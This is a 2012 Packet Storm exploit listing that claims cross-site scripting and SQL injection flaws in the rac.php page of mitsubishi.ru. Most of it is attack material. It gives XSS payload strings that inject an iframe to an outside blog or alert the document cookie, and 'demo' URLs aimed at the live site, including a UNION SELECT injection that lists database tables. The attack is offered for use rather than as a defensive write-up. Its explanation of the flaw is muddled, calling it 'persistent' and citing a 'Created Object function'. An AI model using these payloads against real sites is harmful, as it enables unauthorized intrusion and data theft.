Mitsubishi.ru Cross Site Scripting / SQL Injection

2012-04-24T00:00:00
ID PACKETSTORM:112148
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2012-04-24T00:00:00

Description

                                        
                                            `##################################################  
# Exploit Title: Mitsubishi.ru XSS/SQL Injection Vulnerability  
# Date: 23/04/2012  
# Author: Ryuzaki Lawlet  
# Web/Blog: http://justryuz.blogspot.com  
# Category: webapps  
# Security:RISK: High  
# Vendor or Software Link:-  
# Google dork: -  
# Tested on: Linux  
##################################################  
[~]Exploit/p0c :  
  
http://localhost:80/rac.php?m=[xss]  
http://localhost:80/rac.php?m=[sql]  
  
[~]Proof of Concept:  
  
1.1  
he issue can be exploited by an insert on the Created Object function with script code as value.  
The result is the persistent execution out of the web application context.   
  
Strings: >"<<iframe src=http://justryuz.blogspot.com>3</iframe> OR >"<script>alert(document.cookie)</script>  
  
[~]Dem0 :  
  
http://www.mitsubishi.ru/rac.php?m=>"<<iframe src=http://justryuz.blogspot.com>3</iframe>  
http://www.mitsubishi.ru/rac.php?m=-1859+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,group_concat(table_name),55+from+information_schema.tables+where+table_schema=database()--   
  
  
FB : www.fb.me/justryuz  
+---------------------------------------------------+  
Greetz to :  
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]  
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]  
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]  
-----------------------------------------------------+  
  
CyberSEC © 2012 All rights reserved.  
`